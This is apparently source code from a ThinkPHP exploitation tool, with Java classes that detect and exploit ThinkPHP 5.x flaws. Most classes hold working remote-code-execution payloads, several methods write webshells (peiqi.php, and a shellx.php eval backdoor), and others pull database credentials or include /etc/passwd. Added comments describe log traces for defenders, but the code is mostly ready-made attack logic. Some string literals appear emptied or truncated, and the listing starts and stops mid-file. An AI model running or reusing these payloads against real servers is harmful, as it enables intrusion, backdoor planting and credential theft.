            if (code == 200) {
                return new Result(true, null, url + "/peiqi.php Pass:peiqi");
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }
}
64 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5010.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
//ThinkPHP <= 5.0.13
/**
 * Payload module labelled "ThinkPHP 5.0.10 construct RCE".
 *
 * <p>Defender view: every request is a POST to {@code /?s=<module>} whose body contains
 * {@code _method=__construct} together with a {@code filter[]} entry; {@code getShell}
 * additionally looks for a file named {@code peiqi.php} at the site root.
 */
public class tp5010 implements BasePayload {

    /**
     * Posts two probe bodies in turn and reports a hit when a response contains
     * "PHP Version".
     *
     * @return a true Result describing the matching request, otherwise a false Result
     */
    public Result checkVUL(String url) {
        String CheckStr = "PHP Version";
        String module = Module.getModule(url);
        String payload_url = url + "/?s=" + module;

        // NOTE(review): type arguments look lost in this listing; the String for-each below
        // implies ArrayList<String>.
        ArrayList payloads = new ArrayList() {{
            add("_method=__construct&method=get&filter[]=phpinfo&get[]=-1");
            add("s=-1&_method=__construct&method=get&filter[]=phpinfo");
        }};

        for (String payload : payloads) {
            try {
                HttpRequest req = HttpRequest.post(payload_url).send(payload);
                if (req.body().contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 5.0.10 construct RCE", payload_url + " Post: " + payload);
                }
            } catch (Exception e) {
                // A failed request is printed and the next body is tried.
                e.printStackTrace();
            }
        }
        return new Result(false, "ThinkPHP 5.0.10 construct RCE", null);
    }

    /**
     * Posts one body containing {@code cmd} and returns the part of the response that
     * precedes the first {@code <}, or the whole response when that part is empty.
     *
     * @param cmd text placed in the request body as-is, without encoding
     */
    public Result exeVUL(String url, String cmd) throws Exception {
        String module = Module.getModule(url);
        String payload_url = url + "/?s=" + module;
        String payload_rce = "s=" + cmd + "&_method=__construct&method&filter[]=system";
        try {
            String response = HttpRequest.post(payload_url).send(payload_rce).body();
            // When the response has no '<', indexOf returns -1 and substring throws; the
            // catch below then turns that into a false Result.
            String res = response.substring(0, response.indexOf("<"));
            if (res.equals("")) {
                return new Result(true, null, response);
            }
            return new Result(true, null, res);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }


    /**
     * Posts each body in turn and, after each one, requests {@code /peiqi.php}; HTTP 200 on
     * that request is reported as success.
     *
     * <p>NOTE(review): the quoted content inside several literals below is empty in this
     * listing (it looks removed by text extraction); they are kept exactly as found.
     */
    public Result getShell(String url) throws Exception {
        String module = Module.getModule(url);
        String payload_url = url + "/?s=" + module;

        ArrayList payloads = new ArrayList() {{
            add("_method=__construct&filter[]=system&mytest=echo '' >>peiqi.php");
            add("_method=__construct&method=get&filter[]=assert&get[]=file_put_contents('./peiqi.php','');");
            add("_method=__construct&method=get&filter[]=assert&get[]=/*1111*//***/file_put_contents/*1**/(/***/'./peiqi.php',/***/''/***/);');");
            add("s=file_put_contents('./peiqi.php','');&_method=__construct&method=&filter[]=assert");
            add("_method=__construct&method=get&filter[]=assert&get[]=copy('', './peiqi.php');");
        }};
        for (String payload : payloads) {
            try {
                HttpRequest.post(payload_url).send(payload).body();
                int code = HttpRequest.get(url + "/peiqi.php").code();
                if (code == 200) {
                    return new Result(true, null, url + "/peiqi.php Pass:peiqi");
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }

}
81 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5022_5129.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
// Versions below v5.0.23 and v5.1.31
/**
 * Payload module labelled "ThinkPHP 5.0.22/5.1.29 RCE".
 *
 * <p>Defender view: every request is a GET whose {@code s} parameter names a framework
 * class path — {@code \think\app/invokefunction}, {@code \think\view\driver\php/display} or
 * {@code \think\template\driver\file/write}. {@code getShell} additionally looks for a file
 * named {@code peiqi.php} at the site root.
 */
public class tp5022_5129 implements BasePayload {
    /**
     * Tries three probe URLs and reports a hit when a response body contains "PHP Version".
     *
     * @return a true Result with the first matching URL, otherwise a false Result
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";
        String module = Module.getModule(url);
        // NOTE(review): type arguments look lost in this listing; the String for-each below
        // implies ArrayList<String>. The third literal also ends in an empty "content="
        // value here and is kept exactly as found.
        ArrayList payload_urls = new ArrayList() {{
            add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1");
            add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()");
            add(url + "/?s=/" + module + "/\\think\\view\\driver\\php/display&content=");
        }};
        for (String payload_url : payload_urls) {
            try {
                HttpRequest req1 = HttpRequest.get(payload_url);
                if (req1.body().contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 5.0.22/5.1.29 RCE", payload_url);
                }
            } catch (Exception e) {
                // A failed request is printed and the next candidate is tried.
                e.printStackTrace();
            }
        }
        return new Result(false, "ThinkPHP 5.0.22/5.1.29 RCE", null);
    }

    /**
     * Sends one GET request with {@code cmd} appended and returns the response body.
     *
     * <p>The result is flagged true whenever the request completes; the response is not
     * inspected.
     *
     * @param cmd text appended to the URL as-is, without encoding
     */
    public Result exeVUL(String url, String cmd) throws Exception {
        String module = Module.getModule(url);
        try {
            String payload_url = url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=" + cmd;
            String res = HttpRequest.get(payload_url).body();
            return new Result(true, null, res);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }

    /**
     * Requests each URL in turn and, after each one, requests {@code /peiqi.php}; HTTP 200
     * on that request is reported as success.
     *
     * <p>NOTE(review): several literals below have empty or truncated values in this
     * listing (they look altered by text extraction); they are kept exactly as found.
     */
    public Result getShell(String url) throws Exception {
        String module = Module.getModule(url);

        ArrayList payload_urls = new ArrayList() {{
            add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][]=");
            add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][1]=/***/')/**/;/**/?>");
            add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]=''&vars[1][1]=peiqi.php");
            add(url + "/?s=/" + module + "/\\think\\template\\driver\\file/write&cacheFile=peiqi.php&content=");
        }};
        for (String payload_url : payload_urls) {
            try {
                HttpRequest.get(payload_url).body();
                int code = HttpRequest.get(url + "/peiqi.php").code();
                if (code == 200) {
                    return new Result(true, null, url + "/peiqi.php Pass:peiqi");
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }
}
70 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5023.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 |
// ThinkPHP <= 5.0.23; requires an existing route for method xxx, for example captcha
/**
 * Payload module labelled "ThinkPHP 5.0.23 RCE".
 *
 * <p>Defender view: every request is a POST to {@code /?s=captcha&test=-1} whose body
 * contains {@code _method=__construct} (in varying letter case) together with a
 * {@code filter[]} entry; {@code getShell} additionally looks for a file named
 * {@code peiqi.php} at the site root.
 */
public class tp5023 implements BasePayload {

    /**
     * Posts three probe bodies in turn and reports a hit when a response contains
     * "PHP Version".
     *
     * @return a true Result describing the matching request, otherwise a false Result
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";

        String payload_url = url + "/?s=captcha&test=-1";
        // NOTE(review): type arguments look lost in this listing; the String for-each below
        // implies ArrayList<String>.
        ArrayList payloads = new ArrayList() {{
            add("_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1");
            add("_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo");
            add("_method=__construct&filter[]=phpinfo&method=GET&get[]=1");
        }};
        for (String payload : payloads) {
            try {
                HttpRequest req = HttpRequest.post(payload_url).send(payload);
                if (req.body().contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 5.0.23 RCE", payload_url + " Post: " + payload);
                }
            } catch (Exception e) {
                // A failed request is printed and the next body is tried.
                e.printStackTrace();
            }
        }

        return new Result(false, "ThinkPHP 5.0.23 RCE", null);
    }

    /**
     * Posts bodies containing {@code cmd} and returns the part of the response that
     * precedes the first {@code <}, or the whole response when that part is empty.
     *
     * <p>Both branches inside the try return, so the loop moves on to the next body only
     * when the current attempt throws; the first request that completes decides the result.
     *
     * @param cmd text placed in the request body as-is, without encoding
     */
    public Result exeVUL(String url, String cmd) throws Exception {
        String payload_url = url + "/?s=captcha&test=-1";
        ArrayList payloads = new ArrayList() {{
            add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=" + cmd);
            add("s=" + cmd + "&_method=__construct&method=get&filter[]=system");
            add("s=" + cmd + "&_method=__construct&method&filter[]=system");
        }};
        for (String payload : payloads) {
            try {
                String response = HttpRequest.post(payload_url).send(payload).body();
                // When the response has no '<', indexOf returns -1 and substring throws,
                // which sends control to the catch and on to the next body.
                String res = response.substring(0, response.indexOf("<"));
                if (res.equals("")) {
                    return new Result(true, null, response);
                }
                return new Result(true, null, res);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }

    /**
     * Posts each body in turn and, after each one, requests {@code /peiqi.php}; HTTP 200 on
     * that request is reported as success.
     *
     * <p>NOTE(review): the quoted content inside the literals below is empty in this
     * listing (it looks removed by text extraction); they are kept exactly as found.
     */
    @Override
    public Result getShell(String url) throws Exception {
        String payload_url = url + "/?s=captcha&test=-1";
        ArrayList payloads = new ArrayList() {{
            add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '' >>peiqi.php");
            add("_method=__construct&filter[]=system&method=GET&get[]=echo '' >>peiqi.php");
            add("_method=__construct&filter[]=assert&method=GET&get[]=file_put_contents('./peiqi.php','');");
            add("_method=__construct&filter[]=assert&method=GET&get[]=copy('', './peiqi.php');");
        }};

        for (String payload : payloads) {
            try {
                HttpRequest.post(payload_url).send(payload).body();
                int code = HttpRequest.get(url + "/peiqi.php").code();
                if (code == 200) {
                    return new Result(true, null, url + "/peiqi.php Pass:peiqi");
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }
}
82 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5024_5130.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
// ThinkPHP 5.0.22 to 5.1.29 RCE; tested successfully on 5.1.18
/**
 * Payload module labelled "ThinkPHP 5.0.24-5.1.30 RCE".
 *
 * <p>Defender view: every request is a GET whose {@code s} parameter contains
 * {@code \think\Request/input} (or the lower-case {@code \think\request/input}) together
 * with a {@code filter} parameter; {@code getShell} additionally looks for a file named
 * {@code peiqi.php} at the site root.
 */
public class tp5024_5130 implements BasePayload {
    /**
     * Tries two probe URLs and reports a hit when a response body contains "PHP Version".
     *
     * @return a true Result with the first matching URL, otherwise a false Result
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String CheckStr = "PHP Version";
        String module = Module.getModule(url);
        // NOTE(review): type arguments look lost in this listing; the String for-each below
        // implies ArrayList<String>.
        ArrayList payload_urls = new ArrayList() {{
            add(url + "/?s=" + module + "/\\think\\Request/input&filter[]=phpinfo&data=-1");
            add(url + "/?s=/" + module + "/\\think\\request/input?data[]=phpinfo()&filter=assert");
        }};
        for (String payload_url : payload_urls) {
            try {
                HttpRequest req1 = HttpRequest.get(payload_url);
                if (req1.body().contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 5.0.24-5.1.30 RCE", payload_url);
                }
            } catch (Exception e) {
                // A failed request is printed and the next candidate is tried.
                e.printStackTrace();
            }
        }
        return new Result(false, "ThinkPHP 5.0.24-5.1.30 RCE", null);
    }

    /**
     * Sends one GET request with {@code cmd} appended and returns the response body.
     *
     * <p>The result is flagged true whenever the request completes; the response is not
     * inspected.
     *
     * @param cmd text appended to the URL as-is, without encoding
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        String module = Module.getModule(url);
        try {
            String payload_url = url + "/?s=" + module + "/\\think\\Request/input&filter=system&data=" + cmd;
            HttpRequest req = HttpRequest.get(payload_url);
            String res = req.body();
            return new Result(true, null, res);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }

    /**
     * Sends one GET request, then requests {@code /peiqi.php} and treats HTTP 200 on that
     * second request as success.
     *
     * <p>NOTE(review): the quoted content inside the literal below is empty in this listing
     * (it looks removed by text extraction); it is kept exactly as found.
     */
    @Override
    public Result getShell(String url) throws Exception {
        String module = Module.getModule(url);
        try {
            String payload_url = url + "/?s=" + module + "/\\think\\Request/input&filter=system&data=echo '' >>peiqi.php";
            // code() is called only to make the request complete; its value is discarded.
            HttpRequest.get(payload_url).code();
            int code = HttpRequest.get(url + "/peiqi.php").code();
            if (code == 200) {
                return new Result(true, null, url + "/peiqi.php Pass:peiqi");
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }
}
64 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_db.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.util.Module;
6 | import com.thinkphp.thinkphpgui.entity.Result;
7 |
8 | import java.util.ArrayList;
9 |
10 |
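/**
 * Probe for ThinkPHP 5.x database configuration disclosure.
 *
 * <p>Detection only. Four GET requests route to {@code think\config/get} and ask for
 * {@code database.username}, {@code database.hostname}, {@code database.password} and
 * {@code database.database}.
 */
public class tp5_db implements BasePayload {
    private static final String TITLE = "ThinkPHP 5.x 数据库信息泄露";

    /**
     * Requests the four configuration values and reports the target when at least one
     * response body is short enough to be kept.
     *
     * <p>NOTE(review): the only test applied to a response is its length (under 20
     * characters, 40 for the password). An empty body or a short error page therefore
     * also produces a positive, so confirm the values before reporting. The positive
     * result text contains whatever the server returned for the password; treat saved
     * results as credentials.
     *
     * @param url base URL of the application under test
     * @return positive result listing the kept values, or a negative result
     * @throws Exception if {@code Module.getModule} throws; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String module = Module.getModule(url);
        // A typed array replaces the raw, double-brace ArrayList: the elements stay
        // String and no anonymous ArrayList subclass is created.
        String[] probes = {
            url + "/?s=" + module + "/think\\config/get&name=database.username",
            url + "/?s=" + module + "/think\\config/get&name=database.hostname",
            url + "/?s=" + module + "/think\\config/get&name=database.password",
            url + "/?s=" + module + "/think\\config/get&name=database.database",
        };
        try {
            String username = keepIfShorter(HttpRequest.get(probes[0]).body(), 20);
            String hostname = keepIfShorter(HttpRequest.get(probes[1]).body(), 20);
            String password = keepIfShorter(HttpRequest.get(probes[2]).body(), 40);
            String database = keepIfShorter(HttpRequest.get(probes[3]).body(), 20);
            if (username == null && hostname == null && password == null && database == null) {
                return new Result(false, TITLE, null);
            }
            return new Result(true, TITLE, "username:" + username + " hostname:" + hostname + " password:" + password + " database:" + database);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, TITLE, null);
    }

    /** Returns {@code body} when it is shorter than {@code limit} characters, else {@code null}. */
    private static String keepIfShorter(String body, int limit) {
        return body.length() >= limit ? null : body;
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}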
59 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_file_inclusion.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 |
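/**
 * Probe for ThinkPHP 5 file inclusion through {@code \think\Lang/load} and
 * {@code \think\Config/load}.
 *
 * <p>Detection only. Each route is asked to load {@code /etc/passwd} and
 * {@code C:\WINDOWS\win.ini}; these file names in a {@code file=} parameter are what
 * shows up in access logs.
 */
public class tp5_file_inclusion implements BasePayload {
    private static final String TITLE = "ThinkPHP 5 文件包含漏洞";

    /**
     * Tries the four probe URLs in order and stops at the first body that contains
     * {@code :x:} or {@code for 16-bit app support}.
     *
     * <p>NOTE(review): {@code :x:} is a short marker and can occur in unrelated pages;
     * confirm a positive by reading the response.
     *
     * @param url base URL of the application under test
     * @return positive result carrying the matching probe URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and the next probe is tried
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        // Typed array instead of a raw ArrayList, so the for-each below iterates Strings.
        String[] probes = {
            url + "/?s=index/\\think\\Lang/load&file=/etc/passwd",
            url + "/?s=index/\\think\\Lang/load&file=C:\\WINDOWS\\win.ini",
            url + "/?s=index/\\think\\Config/load&file=/etc/passwd",
            url + "/?s=index/\\think\\Config/load&file=C:\\WINDOWS\\win.ini",
        };
        for (String probe : probes) {
            try {
                String body = HttpRequest.get(probe).body();
                if (body.contains(":x:") || body.contains("for 16-bit app support")) {
                    return new Result(true, TITLE, probe);
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}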
42 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_info_leak.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
/**
 * Probe that this tool labels as the ThinkPHP 5 information leak CVE-2022-25481.
 *
 * <p>Detection only: one GET to {@code /index.php?s=example}. The target is reported when
 * the body contains the word {@code Trace}. That word is not specific to ThinkPHP, so a
 * positive needs manual confirmation before it is treated as a finding.
 */
public class tp5_info_leak implements BasePayload {
    private static final String TITLE = "ThinkPHP 5 信息泄露漏洞(CVE-2022-25481)";
    private static final String MARKER = "Trace";

    /**
     * @param url base URL of the application under test
     * @return positive result carrying the probed URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        final String probe = url + "/index.php?s=example";
        boolean leaked;
        try {
            leaked = HttpRequest.get(probe).body().contains(MARKER);
        } catch (Exception ex) {
            ex.printStackTrace();
            leaked = false;
        }
        return leaked ? new Result(true, TITLE, probe) : new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}
33 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_log.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 | import java.util.Date;
9 |
10 |
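/**
 * Probe for ThinkPHP 5.x runtime logs that are readable over HTTP.
 *
 * <p>Detection only. A positive means today's log file under {@code /runtime/log/} was
 * served to an unauthenticated client; the runtime directory should not be reachable
 * through the web server at all.
 */
public class tp5_log implements BasePayload {
    private static final String TITLE = "ThinkPHP 5.x 日志泄露";

    /**
     * Requests today's {@code .log}, {@code _cli.log}, {@code _error.log} and
     * {@code _sql.log} and reports the first one whose body contains {@code [ info ]}
     * or {@code [ error ]}.
     *
     * <p>The date comes from the clock of the machine running the check, so a target in
     * another time zone may be asked for the wrong day. One {@code try} wraps the whole
     * loop: the first failing request ends the check without trying the remaining files.
     *
     * @param url base URL of the application under test
     * @return positive result carrying the log URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and swallowed
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        Date today = new Date();
        // Directory is yyyyMM, the file name starts with dd.
        String stem = url + "/runtime/log/" + String.format("%tY", today) + String.format("%tm", today)
                + "/" + String.format("%td", today);
        // Typed array instead of a raw, double-brace ArrayList, so the loop iterates Strings.
        String[] candidates = {stem + ".log", stem + "_cli.log", stem + "_error.log", stem + "_sql.log"};
        try {
            for (String candidate : candidates) {
                String body = HttpRequest.get(candidate).body();
                if (body.contains("[ info ]") || body.contains("[ error ]")) {
                    return new Result(true, TITLE, candidate);
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, TITLE, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}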
51 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_method_filter_rce.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 |
7 | import java.util.ArrayList;
8 |
9 |
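/**
 * Probe and command request for the check this tool calls "ThinkPHP 5 method filter RCE".
 *
 * <p>Both methods try {@code /public/index.php} first and {@code /index.php} second. In
 * access logs the requests are GETs whose query string carries {@code _method=filter}
 * together with {@code c=} and {@code f=} parameters.
 */
public class tp5_method_filter_rce implements BasePayload {
    private static final String TITLE = "ThinkPHP 5 method filter RCE";

    /**
     * Sends the {@code c=var_dump&f=md5(2333)} request to both entry points and reports
     * the first whose body contains the expected digest string.
     *
     * @param url base URL of the application under test
     * @return positive result carrying the matching URL, or a negative result
     * @throws Exception declared in the signature; request errors are printed and the next URL is tried
     */
    @Override
    public Result checkVUL(String url) throws Exception {
        String marker = "f7e0b956540676a129760a3eae309294";
        // Typed array instead of a raw ArrayList, so the for-each below iterates Strings.
        String[] probes = {
            url + "/public/index.php?c=var_dump&f=md5(2333)&_method=filter",
            url + "/index.php?c=var_dump&f=md5(2333)&_method=filter",
        };
        for (String probe : probes) {
            try {
                if (HttpRequest.get(probe).body().contains(marker)) {
                    return new Result(true, TITLE, probe);
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, TITLE, null);
    }

    /**
     * Sends {@code c=system&f=<cmd>} to both entry points and returns the body of the
     * first response with a 5xx status; responses with any other status are ignored.
     *
     * @param url base URL of the application under test
     * @param cmd text placed in the {@code f} parameter, appended as given
     * @return {@code Result(true, null, body)} for the first 5xx response, else {@code Result(false, null, null)}
     * @throws Exception declared in the signature; request errors are printed and the next URL is tried
     */
    @Override
    public Result exeVUL(String url, String cmd) throws Exception {
        String[] requests = {
            url + "/public/index.php?c=system&f=" + cmd + "&_method=filter",
            url + "/index.php?c=system&f=" + cmd + "&_method=filter",
        };
        for (String request : requests) {
            try {
                HttpRequest response = HttpRequest.get(request);
                if (response.serverError()) {
                    return new Result(true, null, response.body());
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }

    /** Not implemented for this check; always reports failure. */
    @Override
    public Result getShell(String url) throws Exception {
        return new Result(false, null, null);
    }
}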
56 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/exploit/tp5_session_include.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.exploit;
2 |
3 | import com.github.kevinsawicki.http.HttpRequest;
4 | import com.thinkphp.thinkphpgui.common.BasePayload;
5 | import com.thinkphp.thinkphpgui.entity.Result;
6 | import com.thinkphp.thinkphpgui.util.Tools;
7 |
8 | import java.io.UnsupportedEncodingException;
9 | import java.net.URLEncoder;
10 | import java.nio.charset.StandardCharsets;
11 | import java.util.*;
12 |
13 | //payload by bewhale
/**
 * Check labelled "ThinkPHP 5 session include" by this tool.
 *
 * Every request is a POST whose body starts with "_method=__construct" and whose
 * Cookie header carries a random lower-case PHPSESSID. Server-side traces visible
 * from this code: POST bodies naming think\Session::set or think\__include_file,
 * a reference to /tmp/sess_ followed by the PHPSESSID value (in getShell also in
 * reversed form next to filter[]=strrev, which a rule matching only the forward
 * string would miss), and a shellx.php file next to the front controller.
 */
14 | public class tp5_session_include implements BasePayload {
// Routes tried in order by both checkVUL and getShell.
15 | ArrayList routers = new ArrayList<>(Arrays.asList("/index.php?s=captcha", "/index.php/index", "/index.php?s=index/index/index"));
16 |
/**
 * Two-step probe per route: the first POST passes "test" through think\Session::set;
 * only if that response has a 5xx status does the second POST ask for the session
 * file to be included. The target is reported when the second body contains "think|a:".
 *
 * @param url base URL of the application under test
 * @return positive result with the route and POST body, or a negative result
 * @throws Exception if Tools.getRandomString throws; request errors are printed and the next route is tried
 */
17 | @Override
18 | public Result checkVUL(String url) throws Exception {
19 |
20 | String randomStr = Tools.getRandomString(25).toLowerCase();
21 | String payload = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=test&server[]=1";
22 | for (String route : routers) {
23 | try {
24 | String payload_uri = url + route;
25 | HttpRequest v = HttpRequest.post(payload_uri).header("Cookie", "PHPSESSID=" + randomStr).send(payload);
26 | if (v.serverError()) {
// NOTE(review): payload is overwritten here and never reset, so on any later
// route the first POST carries this second-step body instead of the first one.
27 | payload = "_method=__construct&method=GET&filter[]=think\\__include_file&get[]=/tmp/sess_" + randomStr + "&server[]=1";
28 | String res = HttpRequest.post(payload_uri).header("Cookie", "PHPSESSID=" + randomStr).send(payload).body();
29 | if (res.contains("think|a:")) {
30 | return new Result(true, "ThinkPHP 5 session include", payload_uri + " Post:" + payload);
31 | }
32 | }
33 | } catch (Exception e) {
34 | e.printStackTrace();
35 | }
36 | }
37 |
38 | return new Result(false, "ThinkPHP 5 session include", null);
39 | }
40 |
/** Not implemented for this check; always reports failure. */
41 | @Override
42 | public Result exeVUL(String url, String cmd) throws Exception {
43 | return new Result(false, null, null);
44 | }
45 |
/**
 * Runs the same two-step sequence with six first-step bodies per route, then
 * requests /shellx.php and reports success when that request returns 200.
 *
 * NOTE(review): in this listing exp3 is an empty string, payload1 and payload2 are
 * identical, and shell_content has no opening tag; text may have been lost when the
 * page was extracted, so compare with the upstream file before relying on it.
 *
 * @param url base URL of the application under test
 * @return positive result naming shellx.php or the in-session variant, a negative
 *         result with a message when the include worked but no file appeared, or
 *         Result(false, null, null)
 * @throws Exception declared in the signature; any error inside the loop ends the method with a negative result
 */
46 | //payload by bewhale
47 | @Override
48 | public Result getShell(String url) throws Exception {
49 | String shell_content = "=@eval($_POST['nex']);?>";
50 | String base64_content = Base64.getEncoder().encodeToString(shell_content.getBytes(StandardCharsets.UTF_8));
51 | ArrayList payloads = new ArrayList<>();
52 | try {
53 | String exp1 = "file_put_contents('shellx.php',base64_decode('" + base64_content + "'));";
// NOTE(review): exp2 is computed but not used anywhere below.
54 | String exp2 = Base64.getEncoder().encodeToString(exp1.getBytes(StandardCharsets.UTF_8));
55 | String exp3 = "";
56 | String payload1 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=&server[]=1";
57 | String payload2 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=&server[]=1";
58 | String payload3 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=" + URLEncoder.encode(exp3, "UTF-8") + "&server[]=1";
59 | String payload4 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=" + shell_content + "&server[]=1";
60 | String payload5 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=" + this.bypass("") + "&server[]=1";
61 | String payload6 = "_method=__construct&filter[]=think\\Session::set&method=get&get[]=" + this.bypass(shell_content) + "&server[]=1";
// Order matters: ct below counts position in this list (payload3 is ct == 1).
